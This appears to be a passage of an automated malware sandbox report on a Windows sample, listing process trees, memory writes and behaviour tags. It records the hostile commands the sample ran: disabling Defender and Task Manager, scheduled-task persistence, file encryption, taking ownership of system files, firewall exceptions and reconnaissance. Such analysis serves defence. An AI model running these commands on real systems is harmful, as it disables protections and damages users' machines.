N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2072 wrote to memory of 480 N/A C:\Users\Admin\AppData\Local\Temp\vir.exe C:\Windows\SysWOW64\cmd.exe
PID 2072 wrote to memory of 480 N/A C:\Users\Admin\AppData\Local\Temp\vir.exe C:\Windows\SysWOW64\cmd.exe
PID 2072 wrote to memory of 480 N/A C:\Users\Admin\AppData\Local\Temp\vir.exe C:\Windows\SysWOW64\cmd.exe
PID 2072 wrote to memory of 480 N/A C:\Users\Admin\AppData\Local\Temp\vir.exe C:\Windows\SysWOW64\cmd.exe
PID 480 wrote to memory of 2016 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 480 wrote to memory of 2016 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 480 wrote to memory of 2016 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 480 wrote to memory of 2016 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 480 wrote to memory of 1564 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 480 wrote to memory of 1564 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 480 wrote to memory of 1564 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 480 wrote to memory of 1564 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 480 wrote to memory of 1796 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 480 wrote to memory of 1796 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 480 wrote to memory of 1796 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 480 wrote to memory of 1796 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2016 wrote to memory of 3000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 2016 wrote to memory of 3000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 2016 wrote to memory of 3000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 2016 wrote to memory of 3000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 1564 wrote to memory of 2028 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 1564 wrote to memory of 2028 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 1564 wrote to memory of 2028 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 1564 wrote to memory of 2028 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 2016 wrote to memory of 1204 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 2016 wrote to memory of 1204 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 2016 wrote to memory of 1204 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 2016 wrote to memory of 1204 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 1564 wrote to memory of 1932 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 1564 wrote to memory of 1932 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 1564 wrote to memory of 1932 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 1564 wrote to memory of 1932 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 2016 wrote to memory of 1940 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 2016 wrote to memory of 1940 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 2016 wrote to memory of 1940 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 2016 wrote to memory of 1940 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 1932 wrote to memory of 2164 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1932 wrote to memory of 2164 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1932 wrote to memory of 2164 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1932 wrote to memory of 2164 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1564 wrote to memory of 704 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 1564 wrote to memory of 704 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 1564 wrote to memory of 704 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 1564 wrote to memory of 704 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 704 wrote to memory of 1944 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 704 wrote to memory of 1944 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 704 wrote to memory of 1944 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 704 wrote to memory of 1944 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1564 wrote to memory of 1284 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1564 wrote to memory of 1284 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1564 wrote to memory of 1284 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1564 wrote to memory of 1284 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 480 wrote to memory of 2096 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 480 wrote to memory of 2096 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 480 wrote to memory of 2096 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 480 wrote to memory of 2096 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 480 wrote to memory of 888 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 480 wrote to memory of 888 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 480 wrote to memory of 888 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 480 wrote to memory of 888 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2856 wrote to memory of 2744 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2856 wrote to memory of 2744 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2856 wrote to memory of 2744 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2856 wrote to memory of 2744 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\vir.exe

"C:\Users\Admin\AppData\Local\Temp\vir.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\!main.cmd" "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K spread.cmd

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K doxx.cmd

C:\Windows\SysWOW64\PING.EXE

ping google.com -t -n 1 -s 4 -4

C:\Windows\SysWOW64\xcopy.exe

xcopy 1 C:\Users\Admin\Desktop

C:\Windows\SysWOW64\ipconfig.exe

ipconfig

C:\Windows\SysWOW64\xcopy.exe

xcopy 2 C:\Users\Admin\Desktop

C:\Windows\SysWOW64\net.exe

net accounts

C:\Windows\SysWOW64\xcopy.exe

xcopy 3 C:\Users\Admin\

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 accounts

C:\Windows\SysWOW64\net.exe

net user

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 user

C:\Windows\SysWOW64\tasklist.exe

tasklist /apps /v /fo table

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im WindowsDefender.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K handler.cmd

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2856 CREDAT:275457 /prefetch:2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K cipher.cmd

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\Rover.exe

Rover.exe

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\web.htm

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\Google.exe

Google.exe

C:\Windows\SysWOW64\cipher.exe

cipher /e

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\helper.vbs"

C:\Windows\SysWOW64\PING.EXE

ping google.com -t -n 1 -s 4 -4

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2272 CREDAT:275457 /prefetch:2

C:\Windows\system32\efsui.exe

efsui.exe /efs /keybackup

C:\Windows\SysWOW64\cipher.exe

cipher /e

C:\Windows\SysWOW64\PING.EXE

ping mrbeast.codes -t -n 1 -s 4 -4

C:\Windows\SysWOW64\cipher.exe

cipher /e

C:\Windows\SysWOW64\cipher.exe

cipher /e

C:\Windows\SysWOW64\xcopy.exe

xcopy Google.exe C:\Users\Admin\Desktop

C:\Windows\SysWOW64\xcopy.exe

xcopy Rover.exe C:\Users\Admin\Desktop

C:\Windows\SysWOW64\xcopy.exe

xcopy spinner.gif C:\Users\Admin\Desktop

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K bloatware.cmd

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\regmess.exe

regmess.exe

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe

1.exe

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe

3.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\2.hta"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K SilentSetup.cmd

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\regmess_239e6675-cf83-4482-a135-4b30a903012e\regmess.bat" "

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe

WinaeroTweaker-1.40.0.0-setup.exe /SP- /VERYSILENT

C:\Users\Admin\AppData\Local\Temp\is-BFB59.tmp\WinaeroTweaker-1.40.0.0-setup.tmp

"C:\Users\Admin\AppData\Local\Temp\is-BFB59.tmp\WinaeroTweaker-1.40.0.0-setup.tmp" /SL5="$102F6,2180794,169984,C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe" /SP- /VERYSILENT

C:\Windows\SysWOW64\reg.exe

reg import Setup.reg /reg:32

C:\Windows\SysWOW64\reg.exe

reg import Console.reg /reg:32

C:\Windows\SysWOW64\reg.exe

reg import Desktop.reg /reg:32

C:\Windows\SysWOW64\reg.exe

reg import International.reg /reg:32

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweaker.exe /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweakerhelper.exe /f

C:\Windows\SysWOW64\reg.exe

reg import Fonts.reg /reg:32

C:\Windows\SysWOW64\reg.exe

reg import Cursors.reg /reg:32

C:\Windows\SysWOW64\taskkill.exe

taskkill /im winaerotweakerhelper.exe /f

C:\Windows\SysWOW64\taskkill.exe

taskkill /im winaerotweaker.exe /f

C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe

C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe --config "C:\Users\Admin\AppData\Local\Psiphon3\psiphon.config" --serverList "C:\Users\Admin\AppData\Local\Psiphon3\server_list.dat"

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://ipfounder.net/?sponsor_id=1BC527D3D09985CF&sponsor=psiphon&client_region=GB&client_asn=212238&client_platform=windows&secret=580EfjEI29xL3hoyU6dgP4vSEVxdcGI7JDFkxgjds7PHulSEF0wmORpvzbqxyTwYtpowsY4xMFnfWEnTghe6l8jiV9K5QSZoir2i6fDeKJD6EhL6DkoYTEMu2EE9YJvy3LdCUZ7ncdVC6ipgWx06wznvDLbY1ajfcfRGCpfsQJei2q6tb0GSFh1QK3x3qXKwyjmNPc5J&psireason=connect&psicash=eyJtZXRhZGF0YSI6eyJjbGllbnRfcmVnaW9uIjoiR0IiLCJjbGllbnRfdmVyc2lvbiI6IjE3OSIsInByb3BhZ2F0aW9uX2NoYW5uZWxfaWQiOiI5MkFBQ0M1QkFCRTA5NDRDIiwic3BvbnNvcl9pZCI6IjFCQzUyN0QzRDA5OTg1Q0YiLCJ1c2VyX2FnZW50IjoiUHNpcGhvbi1Qc2lDYXNoLVdpbmRvd3MiLCJ2IjoxfSwidGltZXN0YW1wIjoiMjAyNC0xMS0wOFQwOToxOToxOC41NTVaIiwidG9rZW5zIjpudWxsLCJ2IjoxfQ

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2272 CREDAT:406532 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\scary.exe

scary.exe

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\the.exe

the.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im taskmgr.exe

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\wimloader.dll

wimloader.dll

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\wimloader_fb327d75-e738-4d0c-bcde-5d4cf1554e73\caller.cmd" "

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f

C:\Program Files\SubDir\Romilyaa.exe

"C:\Program Files\SubDir\Romilyaa.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\vPDJkNgZb2qQ.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -EncodedCommand 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

C:\Program Files\SubDir\Romilyaa.exe

"C:\Program Files\SubDir\Romilyaa.exe"

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\ac3.exe

ac3.exe

C:\Windows\SysWOW64\notepad.exe

"C:\Windows\System32\notepad.exe" "C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\shell1.ps1"

C:\Windows\SysWOW64\PING.EXE

ping trustsentry.com -t -n 1 -s 4 -4

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\DS2lJjxX5bYw.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\SysWOW64\PING.EXE

ping ya.ru -t -n 1 -s 4 -4

C:\Windows\SysWOW64\PING.EXE

ping tria.ge -t -n 1 -s 4 -4

C:\Windows\SysWOW64\xcopy.exe

xcopy bloatware C:\Users\Admin\Desktop

C:\Windows\SysWOW64\xcopy.exe

xcopy beastify.url C:\Users\Admin\Desktop

C:\Windows\SysWOW64\xcopy.exe

xcopy shell1.ps1 C:\Users\Admin\Desktop

C:\Program Files (x86)\DroidCam\vc_redist.x86.exe

"C:\Program Files (x86)\DroidCam\vc_redist.x86.exe" /install /quiet

C:\Program Files (x86)\DroidCam\vc_redist.x86.exe

"C:\Program Files (x86)\DroidCam\vc_redist.x86.exe" /install /quiet -burn.unelevated BurnPipe.{C5BD4162-E564-4F77-B365-36BD5383442A} {309B46C4-58D8-4921-9D7C-3B790364B964} 1952

C:\Windows\SysWOW64\cmd.exe

cmd /c install.bat

C:\Windows\SysWOW64\regsvr32.exe

regsvr32 /s "DroidCamFilter32.ax"

C:\Windows\SysWOW64\regsvr32.exe

regsvr32 /s "DroidCamFilter64.ax"

C:\Windows\system32\regsvr32.exe

/s "DroidCamFilter64.ax"

C:\Program Files (x86)\DroidCam\lib\insdrv.exe

"C:\Program Files (x86)\DroidCam\lib\insdrv.exe" +a

C:\Windows\system32\DrvInst.exe

DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{512bbd22-4f1b-194d-e1f1-cd06e8f26378}\droidcam.inf" "9" "6e67c8bbf" "00000000000005DC" "WinSta0\Default" "00000000000005D4" "208" "c:\program files (x86)\droidcam\lib"

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Windows\system32\pnpui.dll,InstallSecurityPromptRunDllW 20 Global\{540e316d-1e11-02b0-5321-292876b9ca2d} Global\{6eb0db00-4d67-6993-166d-7d1fdab5c452} C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\droidcam.inf C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\droidcam.cat

C:\Program Files\SubDir\Romilyaa.exe

"C:\Program Files\SubDir\Romilyaa.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\Kzc7NpqR3EAQ.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\DrvInst.exe

DrvInst.exe "2" "211" "ROOT\MEDIA\0000" "C:\Windows\INF\oem2.inf" "droidcam.inf:MicrosoftDS.NTAMD64:DroidCam_PCMEX:1.0.0.1:droidcam" "6e67c8bbf" "00000000000005DC" "00000000000005FC" "00000000000005F8"

C:\Windows\SysWOW64\takeown.exe

takeown /R /F C:\Windows\explorer.exe

C:\Windows\SysWOW64\icacls.exe

icacls c:\Windows\explorer.exe /grant Admin:(F)

C:\Windows\SysWOW64\takeown.exe

takeown /R /F C:\Windows\System32\dwm.exe

C:\Windows\SysWOW64\icacls.exe

icacls c:\Windows\System32\dwm.exe /grant Admin:(F)

C:\Windows\SysWOW64\xcopy.exe

xcopy xcer.cer C:\Users\Admin\Desktop

C:\Windows\SysWOW64\timeout.exe

timeout /t 15

C:\Program Files\SubDir\Romilyaa.exe

"C:\Program Files\SubDir\Romilyaa.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\xMpCKpeM4s9U.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Program Files\SubDir\Romilyaa.exe

"C:\Program Files\SubDir\Romilyaa.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\exkVVvci5sM8.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\SysWOW64\timeout.exe

timeout /t 15

C:\Program Files\SubDir\Romilyaa.exe

"C:\Program Files\SubDir\Romilyaa.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\SotQmsnK8LSD.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\freebobux.exe

freebobux.exe

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\SolaraBootstraper.exe

SolaraBootstraper.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im ctfmon.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\6CB7.tmp\freebobux.bat""

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\wim.dll

wim.dll

C:\Users\Admin\AppData\Local\Temp\6CB7.tmp\CLWCP.exe

clwcp c:\temp\bg.bmp

C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe

"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"

C:\Users\Admin\AppData\Local\Temp\Umbral.exe

"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"

C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe

"C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\wim_75044109-eb7c-4c16-885c-f601bfbd929b\load.cmd" "

C:\Program Files\VideoLAN\VLC\vlc.exe

"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\wim_75044109-eb7c-4c16-885c-f601bfbd929b\cringe.mp4"

C:\Windows\SysWOW64\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\wim_75044109-eb7c-4c16-885c-f601bfbd929b\lol.ini

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\wim_75044109-eb7c-4c16-885c-f601bfbd929b\mailgooglecom.json

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\wim_75044109-eb7c-4c16-885c-f601bfbd929b\CLOCK.py

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2272 CREDAT:734221 /prefetch:2

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" cryptext.dll,CryptExtOpenCER C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\xcer.cer

C:\Program Files\SubDir\Romilyaa.exe

"C:\Program Files\SubDir\Romilyaa.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\zIF5T2gxy810.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6CB7.tmp\x.vbs"

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe" "!FIXInj.exe" ENABLE

C:\Program Files\SubDir\Romilyaa.exe

"C:\Program Files\SubDir\Romilyaa.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\QmdQV8raYufy.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\f3cb220f1aaa32ca310586e5f62dcab1.exe

f3cb220f1aaa32ca310586e5f62dcab1.exe

C:\Windows\SysWOW64\timeout.exe

timeout /t 15

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2272 CREDAT:3748878 /prefetch:2

C:\Program Files\SubDir\Romilyaa.exe

"C:\Program Files\SubDir\Romilyaa.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

